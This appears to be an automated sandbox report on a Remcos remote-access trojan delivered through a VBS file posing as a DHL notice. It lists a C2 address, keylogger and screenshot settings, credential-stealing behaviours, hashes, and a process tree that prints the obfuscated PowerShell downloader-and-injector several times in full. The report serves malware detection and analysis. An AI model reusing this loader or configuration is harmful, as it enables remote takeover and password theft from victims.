Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-10-2024 15:08

General

  • Target

    DHL1x20LY0736449574.vbs

  • Size

    215KB

  • MD5

    1e13b1cfc831ed2d5540f088b2d9b5cc

  • SHA1

    5fe91312509f191c90bc52c4561652522a336573

  • SHA256

    07b2a32cf575dfe3b0158d36d7ffd9d9e256339f8d0f8d8a99e3a7f00d25f658

  • SHA512

    6a119f54689fb6fbe332a440e3be997eba8189fa9a0b8b2d39e9c5adb11dbdfd7322ed2f83f3157812da0b0a2fb0d3a6d6e6145c2b093f713d8cf009c7ab46e2

  • SSDEEP

    6144:rAOTDoRQRWAgAHNSjH1EWMS/RT/Sfj986x8WIERjNNkSkwwihiW3J0GYeduNvbdb:WlH6z0T2z6

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

185.174.101.182:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-QD9L69

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 10 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DHL1x20LY0736449574.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4924
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Absently Overimbibed skruestikker Brde Matrixerne #>;$tabulatorindstillings='snkloddenes';<#Homeozoic swound Unestranged spaakllingers Pittston #>;$Primaveksler=$Byrthynsak+$host.UI;If ($Primaveksler) {$Overreplete++;}function Tropotaxis($salgsmulighedens){$nonactivator=$Caraibisk+$salgsmulighedens.Length-$Overreplete; for( $versionise=3;$versionise -lt $nonactivator;$versionise+=4){$Trusserederi='Aandsstyrkes';$Vidkids+=$salgsmulighedens[$versionise];$Lufttransport='Paramedicinsk';}$Vidkids;}function spaliets253($Anatomen){ . ($Grandmothers) ($Anatomen);}$versionisencompletability=Tropotaxis 'subM h oEvezLibi P l sylMula Dr/Blg5Tje.Mo 0Wit spe(EleW.lei inO edM.ooso wU.psAge mytNP,rTArk isl1 u0Myo.Aa 0unc;l e ,goWLseiNonn Pe6sli4 st;,ec ForxNon6 Op4Moo;fir Diar Lev Zo:sva1Dyr2 s 1Kdb.Rul0In ) nt F Gcauestec UdksikoAnn/ sw2Unb0Bri1kol0 pp0gi 1Ect0Dor1sum M,F iiHjer eneLngfMano ntxMil/sne1 Da2Usu1 Te. Rm0Pop ';$Glucoprotein=Tropotaxis 'AppUExts oue UprBet-Wara GeGBedEMo.NTraTUfo ';$Ballademager=Tropotaxis ' EshA.ytThytCompNem:spe/hj /Ma,pLydas nuProl urjUdso mrnBuleMeas,eur,tjefreaQualJact K y ch. Uncaumostjm An. aga Udu ,i/H maBloa Gl2Lg /A.iU m n lefWinoNe u utnKnod v.KatmP adFulpBec ';$sycosis=Tropotaxis 'Alv>,eg ';$Grandmothers=Tropotaxis 'D fITipE BixTe ';$versionisendianajones='Tebordene';$dagpengeydelsers='\Domkirken40.Kon';spaliets253 (Tropotaxis ' Ap$TalG InlsmaOBlabForaRigLMin: Taa riL L tU ssCyktDrkEO.kMNeuMP sEnetrs iN TaEPy,sKul2Mad3 U 9sc,= Ph$Vale riNNonVUnt: TiAst,P up adAppAResTM.cADat+ sa$ Bed,osaRerG apse e NiNClagstre.ksYkaldsphe EflTi.s are aaREdgsAus ');spaliets253 (Tropotaxis ' Mi$BargFnil ncOF,kBKibA DiLCoa: orsstoU s,l ElFslea CytsepiDisZm rE hr= An$k ib.yraBu L Colkida ucdslie.nsMEmbaChagP eeOverAu,.F asrygPBlulblaiEndtAcc(din$uncs Dry.awCEtaoKissJvniUdpsCen) A. ');spaliets253 (Tropotaxis 'P,y[BerNB,uE Kot In.Fess aoEPi,rFo vAntisocC.ejeR,nPTr oAdrisninsevts oMPolaC enskaAPatgBrne AtRRee]Eft:s k:.onsAdaeVitc .oUH drImpI HytRefy TvPForr s ORehtD,cO FocattostiLNat syn=Hy. bl [ Pon V E sttsm..phtspr,ElevCBedu ksr ngIsuctstayUn PMasR.ekOtegt ,noPleCJapO ZeLKistBonyFu p lee ,o]Ma,:Run:DrfTlolL DisBe.1 un2syd ');$Ballademager=$sulfatize[0];$Begavelser=(Tropotaxis 'En $ ocGE clRutoO eBGenAParL st: PaddinIUdmsstjEN.nnbusT DeAColn VagJanl LeeOp m skeBuzN s ts ts O = MiNCaoeWehwKor-AeroForBAg j heE stCGr tAnn J.sPr y AgsCu tTapE nmMit.Tr N AnE GeT t.BrsWUdeeAenbN,nc heL L i I.E ufnTilTHnn ');spaliets253 ($Begavelser);spaliets253 (Tropotaxis ' s $MerDL mi Tisparela n,kitBs aortn ,pg arlRhee ugm CreBurnGritRegsTop.Mi H yoeY ea CadCrueRegrAmysMil[Bil$ConGusil Mou .icFi oI,tpForrspyoTumt ase vii skn Fo] .o= Vi$ EnvOuteAr,rM.ts Glisvao,ransubi isKe eBi,nUntcBaroso.mBegps,ll,nfeRegtHusaMalbGr i ,ulArtiUnctstyy e ');$mudstone=Tropotaxis '.no$Re.D MiiNedsM.le Unn.ect AfaUnin Elg gel Ble,anmPhoeEntnBj t susAnd.Un DHeloKl.wReln C lsaloToraschdAdvFAn i Ekl Coesom( al$silB ,daAntl nl ehaDksdFroeTo,m.alaEargK ue ir Mu, Fo$Hems,neaC imUl.fTorusprnDoldDrosE iaGibnInssUdmvLynaTj rs.ie betAm.sdom),er ';$samfundsansvarets=$Altstemmernes239;spaliets253 (Tropotaxis 'Mas$TrsGUnblPreO spb la orl Au: EnpP.lR TeEDifvEp,=rea(skoT ureH lsTontVer- apAf AIndtEgoHFr Eyl$ Mas K,a l msujfoarUpsyn ged.onsBl AKluNOppsPervs faIonRVelePsiT snsseg)sl ');while (!$Prev) {spaliets253 (Tropotaxis 'uss$ Dug F.lHa oCitbD iaserlsol:sidvU arB,rdjanis an UndUner T i ,unDung Te=sub$In tNonrTrauL ceTar ') ;spaliets253 $mudstone;spaliets253 (Tropotaxis 'Tons,emTColAFelrLogTsp.-auts.ivLOroEPsyE TipUdl Pl4Joy ');spaliets253 (Tropotaxis 'Fo $Ceng unlRekoRo b ia elLAmo: LepBycR P E h VGra=Ter(A,ttR gEUd,sRecTMaa-N,tpTibaUfdTZabhRe E,b$,ass V.aK nmHa fOv,ustyNVerdEposRunAM enchosDomvWi AFjeR DoeT.rt FosDat)Ful ') ;spaliets253 (Tropotaxis 'Dis$Vi.GHegL Udo.ambRafa pLRep:Bo c.ubiZeanMr EBitlVan=gru$sangEnclba OCo bPupaModLRa : LuPseloOmdsWantMotsCarCadvaUtrpT tuArbl DraRearRafIunds .u+Be,+Uns%And$ ols Flu VelFlyfslvaR ctPleiFatzst.EExt.Un CDe oOp UGunNVrit .d ') ;$Ballademager=$sulfatize[$Cinel];}$Perseveringly202=311594;$Dissidenter=31225;spaliets253 (Tropotaxis 'Eli$ .dGhislRr ORoeBc,ea rbLTin:UnrKBetI BuRNgss UnT onE UdIunin tr O,=Hyp DonGBefe,ilt Ra-OstCForo siNOplt GieMotnKlat p Ver$Reps .ea ukMOssF,enUJunN,omD K sOveaB.lnLessK rv,ata tRGi,ENonT srssv. ');spaliets253 (Tropotaxis 'In $ Idgs bl.oroMetbsapaauglEve:chaRLgpespov iki nodG ne.lirWige Krs.en Pol=Ra s,m[ I,ss,iy rhsLuntTare anm Y,.A tCTrioMi nKonv ogesprrskrtPre]Far:Bar:PerFNatrsulo C m V BPlaaE.psTjue Go6 ik4KonsAutt Prrsu i ytnAvag an(Ord$staK raistarPolsFortsa ePyriKvanO.e)Des ');spaliets253 (Tropotaxis ' Re$stagPo.L.idOD sbPykaTelLtra: HiUOriNsceo snrskfDT.mI koNOvoaFinT C,EUu ner= sh K,i[c.nsa fY MisOveTscheBogmHaa.dest Mae VixTreTG b. joEmicNFinc skOL pDMoriAfpNOvegs.u] Fy:str:s vApirsHiscPr I ori xp.FdeG U,eParTRinsKhaT H,rBumIRomnRe GA b( Ov$EksRTykEgraVFriiDecDF.re ,or U,EEpissno)Pye ');spaliets253 (Tropotaxis '.la$ H,gCoql ipOOutb egaAntLHom:RundUndACa C UdisamtZesER.n= ov$OveuBilNPe OR,nr A DFu.i ,oNIndAProtsa e.mb.De sErhuThoB udsafrTQ aRsani FrN K gMin( In$LofpFitEManrId s psEHjevud e DiR.onI GoNAttG U LBigYRen2Cha0agt2Fil,Fi.$ siDGaliViksChas ,eI Hud bse suNLe Tde e rRMe )spr ');spaliets253 $Dacite;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3280
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Absently Overimbibed skruestikker Brde Matrixerne #>;$tabulatorindstillings='snkloddenes';<#Homeozoic swound Unestranged spaakllingers Pittston #>;$Primaveksler=$Byrthynsak+$host.UI;If ($Primaveksler) {$Overreplete++;}function Tropotaxis($salgsmulighedens){$nonactivator=$Caraibisk+$salgsmulighedens.Length-$Overreplete; for( $versionise=3;$versionise -lt $nonactivator;$versionise+=4){$Trusserederi='Aandsstyrkes';$Vidkids+=$salgsmulighedens[$versionise];$Lufttransport='Paramedicinsk';}$Vidkids;}function spaliets253($Anatomen){ . ($Grandmothers) ($Anatomen);}$versionisencompletability=Tropotaxis 'subM h oEvezLibi P l sylMula Dr/Blg5Tje.Mo 0Wit spe(EleW.lei inO edM.ooso wU.psAge mytNP,rTArk isl1 u0Myo.Aa 0unc;l e ,goWLseiNonn Pe6sli4 st;,ec ForxNon6 Op4Moo;fir Diar Lev Zo:sva1Dyr2 s 1Kdb.Rul0In ) nt F Gcauestec UdksikoAnn/ sw2Unb0Bri1kol0 pp0gi 1Ect0Dor1sum M,F iiHjer eneLngfMano ntxMil/sne1 Da2Usu1 Te. Rm0Pop ';$Glucoprotein=Tropotaxis 'AppUExts oue UprBet-Wara GeGBedEMo.NTraTUfo ';$Ballademager=Tropotaxis ' EshA.ytThytCompNem:spe/hj /Ma,pLydas nuProl urjUdso mrnBuleMeas,eur,tjefreaQualJact K y ch. Uncaumostjm An. aga Udu ,i/H maBloa Gl2Lg /A.iU m n lefWinoNe u utnKnod v.KatmP adFulpBec ';$sycosis=Tropotaxis 'Alv>,eg ';$Grandmothers=Tropotaxis 'D fITipE BixTe ';$versionisendianajones='Tebordene';$dagpengeydelsers='\Domkirken40.Kon';spaliets253 (Tropotaxis ' Ap$TalG InlsmaOBlabForaRigLMin: Taa riL L tU ssCyktDrkEO.kMNeuMP sEnetrs iN TaEPy,sKul2Mad3 U 9sc,= Ph$Vale riNNonVUnt: TiAst,P up adAppAResTM.cADat+ sa$ Bed,osaRerG apse e NiNClagstre.ksYkaldsphe EflTi.s are aaREdgsAus ');spaliets253 (Tropotaxis ' Mi$BargFnil ncOF,kBKibA DiLCoa: orsstoU s,l ElFslea CytsepiDisZm rE hr= An$k ib.yraBu L Colkida ucdslie.nsMEmbaChagP eeOverAu,.F asrygPBlulblaiEndtAcc(din$uncs Dry.awCEtaoKissJvniUdpsCen) A. ');spaliets253 (Tropotaxis 'P,y[BerNB,uE Kot In.Fess aoEPi,rFo vAntisocC.ejeR,nPTr oAdrisninsevts oMPolaC enskaAPatgBrne AtRRee]Eft:s k:.onsAdaeVitc .oUH drImpI HytRefy TvPForr s ORehtD,cO FocattostiLNat syn=Hy. bl [ Pon V E sttsm..phtspr,ElevCBedu ksr ngIsuctstayUn PMasR.ekOtegt ,noPleCJapO ZeLKistBonyFu p lee ,o]Ma,:Run:DrfTlolL DisBe.1 un2syd ');$Ballademager=$sulfatize[0];$Begavelser=(Tropotaxis 'En $ ocGE clRutoO eBGenAParL st: PaddinIUdmsstjEN.nnbusT DeAColn VagJanl LeeOp m skeBuzN s ts ts O = MiNCaoeWehwKor-AeroForBAg j heE stCGr tAnn J.sPr y AgsCu tTapE nmMit.Tr N AnE GeT t.BrsWUdeeAenbN,nc heL L i I.E ufnTilTHnn ');spaliets253 ($Begavelser);spaliets253 (Tropotaxis ' s $MerDL mi Tisparela n,kitBs aortn ,pg arlRhee ugm CreBurnGritRegsTop.Mi H yoeY ea CadCrueRegrAmysMil[Bil$ConGusil Mou .icFi oI,tpForrspyoTumt ase vii skn Fo] .o= Vi$ EnvOuteAr,rM.ts Glisvao,ransubi isKe eBi,nUntcBaroso.mBegps,ll,nfeRegtHusaMalbGr i ,ulArtiUnctstyy e ');$mudstone=Tropotaxis '.no$Re.D MiiNedsM.le Unn.ect AfaUnin Elg gel Ble,anmPhoeEntnBj t susAnd.Un DHeloKl.wReln C lsaloToraschdAdvFAn i Ekl Coesom( al$silB ,daAntl nl ehaDksdFroeTo,m.alaEargK ue ir Mu, Fo$Hems,neaC imUl.fTorusprnDoldDrosE iaGibnInssUdmvLynaTj rs.ie betAm.sdom),er ';$samfundsansvarets=$Altstemmernes239;spaliets253 (Tropotaxis 'Mas$TrsGUnblPreO spb la orl Au: EnpP.lR TeEDifvEp,=rea(skoT ureH lsTontVer- apAf AIndtEgoHFr Eyl$ Mas K,a l msujfoarUpsyn ged.onsBl AKluNOppsPervs faIonRVelePsiT snsseg)sl ');while (!$Prev) {spaliets253 (Tropotaxis 'uss$ Dug F.lHa oCitbD iaserlsol:sidvU arB,rdjanis an UndUner T i ,unDung Te=sub$In tNonrTrauL ceTar ') ;spaliets253 $mudstone;spaliets253 (Tropotaxis 'Tons,emTColAFelrLogTsp.-auts.ivLOroEPsyE TipUdl Pl4Joy ');spaliets253 (Tropotaxis 'Fo $Ceng unlRekoRo b ia elLAmo: LepBycR P E h VGra=Ter(A,ttR gEUd,sRecTMaa-N,tpTibaUfdTZabhRe E,b$,ass V.aK nmHa fOv,ustyNVerdEposRunAM enchosDomvWi AFjeR DoeT.rt FosDat)Ful ') ;spaliets253 (Tropotaxis 'Dis$Vi.GHegL Udo.ambRafa pLRep:Bo c.ubiZeanMr EBitlVan=gru$sangEnclba OCo bPupaModLRa : LuPseloOmdsWantMotsCarCadvaUtrpT tuArbl DraRearRafIunds .u+Be,+Uns%And$ ols Flu VelFlyfslvaR ctPleiFatzst.EExt.Un CDe oOp UGunNVrit .d ') ;$Ballademager=$sulfatize[$Cinel];}$Perseveringly202=311594;$Dissidenter=31225;spaliets253 (Tropotaxis 'Eli$ .dGhislRr ORoeBc,ea rbLTin:UnrKBetI BuRNgss UnT onE UdIunin tr O,=Hyp DonGBefe,ilt Ra-OstCForo siNOplt GieMotnKlat p Ver$Reps .ea ukMOssF,enUJunN,omD K sOveaB.lnLessK rv,ata tRGi,ENonT srssv. ');spaliets253 (Tropotaxis 'In $ Idgs bl.oroMetbsapaauglEve:chaRLgpespov iki nodG ne.lirWige Krs.en Pol=Ra s,m[ I,ss,iy rhsLuntTare anm Y,.A tCTrioMi nKonv ogesprrskrtPre]Far:Bar:PerFNatrsulo C m V BPlaaE.psTjue Go6 ik4KonsAutt Prrsu i ytnAvag an(Ord$staK raistarPolsFortsa ePyriKvanO.e)Des ');spaliets253 (Tropotaxis ' Re$stagPo.L.idOD sbPykaTelLtra: HiUOriNsceo snrskfDT.mI koNOvoaFinT C,EUu ner= sh K,i[c.nsa fY MisOveTscheBogmHaa.dest Mae VixTreTG b. joEmicNFinc skOL pDMoriAfpNOvegs.u] Fy:str:s vApirsHiscPr I ori xp.FdeG U,eParTRinsKhaT H,rBumIRomnRe GA b( Ov$EksRTykEgraVFriiDecDF.re ,or U,EEpissno)Pye ');spaliets253 (Tropotaxis '.la$ H,gCoql ipOOutb egaAntLHom:RundUndACa C UdisamtZesER.n= ov$OveuBilNPe OR,nr A DFu.i ,oNIndAProtsa e.mb.De sErhuThoB udsafrTQ aRsani FrN K gMin( In$LofpFitEManrId s psEHjevud e DiR.onI GoNAttG U LBigYRen2Cha0agt2Fil,Fi.$ siDGaliViksChas ,eI Hud bse suNLe Tde e rRMe )spr ');spaliets253 $Dacite;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2860
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\syswow64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:3492
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\SysWOW64\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\hrbfvnklsohahzodnj"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3792
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\SysWOW64\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\rtgxwfumgwafsnkpeuzcd"
        3⤵
        • Accesses Microsoft Outlook accounts
        • System Location Discovery: System Language Discovery
        PID:4508
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\SysWOW64\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\uomixyfgueskuuytnfldgqlbr"
        3⤵
          PID:4780
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\SysWOW64\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\uomixyfgueskuuytnfldgqlbr"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1920
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1x20LY0736449574.vbs"
          3⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2744
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Absently Overimbibed skruestikker Brde Matrixerne #>;$tabulatorindstillings='snkloddenes';<#Homeozoic swound Unestranged spaakllingers Pittston #>;$Primaveksler=$Byrthynsak+$host.UI;If ($Primaveksler) {$Overreplete++;}function Tropotaxis($salgsmulighedens){$nonactivator=$Caraibisk+$salgsmulighedens.Length-$Overreplete; for( $versionise=3;$versionise -lt $nonactivator;$versionise+=4){$Trusserederi='Aandsstyrkes';$Vidkids+=$salgsmulighedens[$versionise];$Lufttransport='Paramedicinsk';}$Vidkids;}function spaliets253($Anatomen){ . ($Grandmothers) ($Anatomen);}$versionisencompletability=Tropotaxis 'subM h oEvezLibi P l sylMula Dr/Blg5Tje.Mo 0Wit spe(EleW.lei inO edM.ooso wU.psAge mytNP,rTArk isl1 u0Myo.Aa 0unc;l e ,goWLseiNonn Pe6sli4 st;,ec ForxNon6 Op4Moo;fir Diar Lev Zo:sva1Dyr2 s 1Kdb.Rul0In ) nt F Gcauestec UdksikoAnn/ sw2Unb0Bri1kol0 pp0gi 1Ect0Dor1sum M,F iiHjer eneLngfMano ntxMil/sne1 Da2Usu1 Te. Rm0Pop ';$Glucoprotein=Tropotaxis 'AppUExts oue UprBet-Wara GeGBedEMo.NTraTUfo ';$Ballademager=Tropotaxis ' EshA.ytThytCompNem:spe/hj /Ma,pLydas nuProl urjUdso mrnBuleMeas,eur,tjefreaQualJact K y ch. Uncaumostjm An. aga Udu ,i/H maBloa Gl2Lg /A.iU m n lefWinoNe u utnKnod v.KatmP adFulpBec ';$sycosis=Tropotaxis 'Alv>,eg ';$Grandmothers=Tropotaxis 'D fITipE BixTe ';$versionisendianajones='Tebordene';$dagpengeydelsers='\Domkirken40.Kon';spaliets253 (Tropotaxis ' Ap$TalG InlsmaOBlabForaRigLMin: Taa riL L tU ssCyktDrkEO.kMNeuMP sEnetrs iN TaEPy,sKul2Mad3 U 9sc,= Ph$Vale riNNonVUnt: TiAst,P up adAppAResTM.cADat+ sa$ Bed,osaRerG apse e NiNClagstre.ksYkaldsphe EflTi.s are aaREdgsAus ');spaliets253 (Tropotaxis ' Mi$BargFnil ncOF,kBKibA DiLCoa: orsstoU s,l ElFslea CytsepiDisZm rE hr= An$k ib.yraBu L Colkida ucdslie.nsMEmbaChagP eeOverAu,.F asrygPBlulblaiEndtAcc(din$uncs Dry.awCEtaoKissJvniUdpsCen) A. ');spaliets253 (Tropotaxis 'P,y[BerNB,uE Kot In.Fess aoEPi,rFo vAntisocC.ejeR,nPTr oAdrisninsevts oMPolaC enskaAPatgBrne AtRRee]Eft:s k:.onsAdaeVitc .oUH drImpI HytRefy TvPForr s ORehtD,cO FocattostiLNat syn=Hy. bl [ Pon V E sttsm..phtspr,ElevCBedu ksr ngIsuctstayUn PMasR.ekOtegt ,noPleCJapO ZeLKistBonyFu p lee ,o]Ma,:Run:DrfTlolL DisBe.1 un2syd ');$Ballademager=$sulfatize[0];$Begavelser=(Tropotaxis 'En $ ocGE clRutoO eBGenAParL st: PaddinIUdmsstjEN.nnbusT DeAColn VagJanl LeeOp m skeBuzN s ts ts O = MiNCaoeWehwKor-AeroForBAg j heE stCGr tAnn J.sPr y AgsCu tTapE nmMit.Tr N AnE GeT t.BrsWUdeeAenbN,nc heL L i I.E ufnTilTHnn ');spaliets253 ($Begavelser);spaliets253 (Tropotaxis ' s $MerDL mi Tisparela n,kitBs aortn ,pg arlRhee ugm CreBurnGritRegsTop.Mi H yoeY ea CadCrueRegrAmysMil[Bil$ConGusil Mou .icFi oI,tpForrspyoTumt ase vii skn Fo] .o= Vi$ EnvOuteAr,rM.ts Glisvao,ransubi isKe eBi,nUntcBaroso.mBegps,ll,nfeRegtHusaMalbGr i ,ulArtiUnctstyy e ');$mudstone=Tropotaxis '.no$Re.D MiiNedsM.le Unn.ect AfaUnin Elg gel Ble,anmPhoeEntnBj t susAnd.Un DHeloKl.wReln C lsaloToraschdAdvFAn i Ekl Coesom( al$silB ,daAntl nl ehaDksdFroeTo,m.alaEargK ue ir Mu, Fo$Hems,neaC imUl.fTorusprnDoldDrosE iaGibnInssUdmvLynaTj rs.ie betAm.sdom),er ';$samfundsansvarets=$Altstemmernes239;spaliets253 (Tropotaxis 'Mas$TrsGUnblPreO spb la orl Au: EnpP.lR TeEDifvEp,=rea(skoT ureH lsTontVer- apAf AIndtEgoHFr Eyl$ Mas K,a l msujfoarUpsyn ged.onsBl AKluNOppsPervs faIonRVelePsiT snsseg)sl ');while (!$Prev) {spaliets253 (Tropotaxis 'uss$ Dug F.lHa oCitbD iaserlsol:sidvU arB,rdjanis an UndUner T i ,unDung Te=sub$In tNonrTrauL ceTar ') ;spaliets253 $mudstone;spaliets253 (Tropotaxis 'Tons,emTColAFelrLogTsp.-auts.ivLOroEPsyE TipUdl Pl4Joy ');spaliets253 (Tropotaxis 'Fo $Ceng unlRekoRo b ia elLAmo: LepBycR P E h VGra=Ter(A,ttR gEUd,sRecTMaa-N,tpTibaUfdTZabhRe E,b$,ass V.aK nmHa fOv,ustyNVerdEposRunAM enchosDomvWi AFjeR DoeT.rt FosDat)Ful ') ;spaliets253 (Tropotaxis 'Dis$Vi.GHegL Udo.ambRafa pLRep:Bo c.ubiZeanMr EBitlVan=gru$sangEnclba OCo bPupaModLRa : LuPseloOmdsWantMotsCarCadvaUtrpT tuArbl DraRearRafIunds .u+Be,+Uns%And$ ols Flu VelFlyfslvaR ctPleiFatzst.EExt.Un CDe oOp UGunNVrit .d ') ;$Ballademager=$sulfatize[$Cinel];}$Perseveringly202=311594;$Dissidenter=31225;spaliets253 (Tropotaxis 'Eli$ .dGhislRr ORoeBc,ea rbLTin:UnrKBetI BuRNgss UnT onE UdIunin tr O,=Hyp DonGBefe,ilt Ra-OstCForo siNOplt GieMotnKlat p Ver$Reps .ea ukMOssF,enUJunN,omD K sOveaB.lnLessK rv,ata tRGi,ENonT srssv. ');spaliets253 (Tropotaxis 'In $ Idgs bl.oroMetbsapaauglEve:chaRLgpespov iki nodG ne.lirWige Krs.en Pol=Ra s,m[ I,ss,iy rhsLuntTare anm Y,.A tCTrioMi nKonv ogesprrskrtPre]Far:Bar:PerFNatrsulo C m V BPlaaE.psTjue Go6 ik4KonsAutt Prrsu i ytnAvag an(Ord$staK raistarPolsFortsa ePyriKvanO.e)Des ');spaliets253 (Tropotaxis ' Re$stagPo.L.idOD sbPykaTelLtra: HiUOriNsceo snrskfDT.mI koNOvoaFinT C,EUu ner= sh K,i[c.nsa fY MisOveTscheBogmHaa.dest Mae VixTreTG b. joEmicNFinc skOL pDMoriAfpNOvegs.u] Fy:str:s vApirsHiscPr I ori xp.FdeG U,eParTRinsKhaT H,rBumIRomnRe GA b( Ov$EksRTykEgraVFriiDecDF.re ,or U,EEpissno)Pye ');spaliets253 (Tropotaxis '.la$ H,gCoql ipOOutb egaAntLHom:RundUndACa C UdisamtZesER.n= ov$OveuBilNPe OR,nr A DFu.i ,oNIndAProtsa e.mb.De sErhuThoB udsafrTQ aRsani FrN K gMin( In$LofpFitEManrId s psEHjevud e DiR.onI GoNAttG U LBigYRen2Cha0agt2Fil,Fi.$ siDGaliViksChas ,eI Hud bse suNLe Tde e rRMe )spr ');spaliets253 $Dacite;"
            4⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2220
            • C:\Windows\SysWOW64\msiexec.exe
              "C:\Windows\syswow64\msiexec.exe"
              5⤵
              • Blocklisted process makes network request
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              PID:2460

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      71444def27770d9071039d005d0323b7

      SHA1

      cef8654e95495786ac9347494f4417819373427e

      SHA256

      8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

      SHA512

      a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

    • C:\Users\Admin\AppData\Local\Temp\1x20LY0736449574.vbs

      Filesize

      215KB

      MD5

      1e13b1cfc831ed2d5540f088b2d9b5cc

      SHA1

      5fe91312509f191c90bc52c4561652522a336573

      SHA256

      07b2a32cf575dfe3b0158d36d7ffd9d9e256339f8d0f8d8a99e3a7f00d25f658

      SHA512

      6a119f54689fb6fbe332a440e3be997eba8189fa9a0b8b2d39e9c5adb11dbdfd7322ed2f83f3157812da0b0a2fb0d3a6d6e6145c2b093f713d8cf009c7ab46e2

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dafbjgdj.cvc.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\hrbfvnklsohahzodnj

      Filesize

      4KB

      MD5

      17eece3240d08aa4811cf1007cfe2585

      SHA1

